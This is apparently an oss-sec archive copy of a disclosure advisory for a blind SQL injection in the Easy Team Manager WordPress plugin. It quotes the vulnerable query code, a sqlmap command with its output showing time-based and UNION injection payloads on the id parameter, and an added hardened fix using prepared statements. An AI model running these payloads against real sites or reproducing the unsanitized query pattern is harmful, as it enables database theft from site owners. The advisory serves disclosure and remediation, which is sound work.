oss-sec mailing list archives
Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Tue, 30 May 2017 18:46:16 -0400
Title: Blind SQL Injection in Wordpress Plugin Easy Team Manager v1.3.2
Author: Larry W. Cashdollar, @_larry0
Date: 2017-05-24
CVE-ID: [CVE-2017-1002023]
Download Site: https://wordpress.org/plugins/easy-team-manager/
Vendor: https://daisythemes.com/
Vendor Notified: 2017-05-24
Vendor Contact: web form contact
Advisory: http://www.vapidlabs.com/advisory.php?v=194

Description:
Easy Team Manager helps you create team members with short descriptions and social profile links with smooth hover effects.

Vulnerability:
The following code does not sanitize $_GET['id'] before making it part of an SQL statement in file ./easy-team-manager/inc/easy_team_manager_desc_edit.php:

    global $wpdb;
    $easy_team_manager_desc = $wpdb->get_results("SELECT *from ".$wpdb->prefix."easy_team_manager_description where id=".$_GET['id']);
    foreach ($easy_team_manager_desc as $s ){
        $ind_name_detail = unserialize($s->name);
        $socia_media = unserialize($s->social_media);
        $id=$_GET['id'];
        $ind_position = esc_attr($s->position);
        $ind_image=$s->image;
        $ind_email_detail = unserialize($s->email);
        $ind_phone_detail = unserialize($s->phone);
        $ind_desc = esc_attr(stripcslashes($s->ind_description));

The value of $_GET['id'] is concatenated directly into the WHERE clause, so it is interpreted as SQL rather than as an integer. This allows blind SQL injection via the id parameter by an authenticated user with edit team privileges.

Exploit Code:

    $ sqlmap -u 'http://example.com/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=*' --load-cookies=./cookies.txt --level=4 --risk=3 --dbms=mysql

    [08:39:09] [INFO] URI parameter '#1*' is 'MySQL UNION query (84) - 1 to 20 columns' injectable
    URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 3115 HTTP(s) requests:
    ---
    Parameter: #1* (URI)
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=(CASE WHEN (3623=3623) THEN SLEEP(5) ELSE 3623 END)

        Type: UNION query
        Title: MySQL UNION query (84) - 5 columns
        Payload: http://example.com:80/wordpress/wp-admin/admin.php?page=easy_team_manager_edit&id=-5307 UNION ALL SELECT 84,CONCAT(0x7170787a71,0x58795a426e467457726744686879446f4e4d7a576a464758516e6765526549536279426759527443,0x7178787171),84,84,84#
    ---
    [08:39:15] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 16.04 (xenial)
    web application technology: Apache 2.4.18
    back-end DBMS: MySQL >= 5.0.12
    [08:39:15] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

    [*] shutting down at 08:39:15
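The fix is to stop building the statement by string concatenation. As an added example (this is not the vendor's patch and not code from the plugin), the lookup below coerces the request value to an integer with WordPress's absint() and binds it through $wpdb->prepare() with a %d placeholder, so the id can no longer alter the query's structure. The function name etm_get_description_by_id is an assumption; the table name and the rest of the edit page are as on the page.

```php
<?php
// Added example, not the plugin's own code. Hardened replacement for the
// unsanitized lookup in easy_team_manager_desc_edit.php.
// The function name is an assumption made for this example.
function etm_get_description_by_id( $raw_id ) {
    global $wpdb;

    // absint() turns the request value into a non-negative integer.
    // Any value that is not a plain id (anything carrying SQL syntax)
    // collapses to a number, so there is nothing left to inject.
    $id = absint( $raw_id );
    if ( 0 === $id ) {
        // No valid id supplied: do not build or run a query at all.
        return array();
    }

    // The prefix comes from wp-config.php, not from the request, so it is
    // safe to place in the table name; identifiers cannot be bound anyway.
    $table = $wpdb->prefix . 'easy_team_manager_description';

    // prepare() interpolates %d as an integer literal. The user-controlled
    // value is never pasted into the SQL text as-is.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$table} WHERE id = %d",
        $id
    );

    // Same return shape as the original get_results() call: an array of rows.
    return $wpdb->get_results( $sql );
}

// Usage at the top of the edit page, replacing the unsanitized $_GET['id']
// concatenation shown in the advisory.
$easy_team_manager_desc = isset( $_GET['id'] )
    ? etm_get_description_by_id( $_GET['id'] )
    : array();

if ( empty( $easy_team_manager_desc ) ) {
    wp_die( 'Team member not found.' );
}

foreach ( $easy_team_manager_desc as $s ) {
    // The remainder of the page's per-row handling is unchanged from the
    // snippet quoted above; the integer $id is reused where $_GET['id'] was.
    $id = absint( $_GET['id'] );
    $ind_position = esc_attr( $s->position );
}
```

With this in place the time-based and UNION payloads reported by sqlmap both reduce to an integer (the leading digits, or 0), so the query either returns the matching row or nothing. The capability check that gates the edit page is unchanged; the point of the example is only that the id reaches the database as bound data, never as SQL.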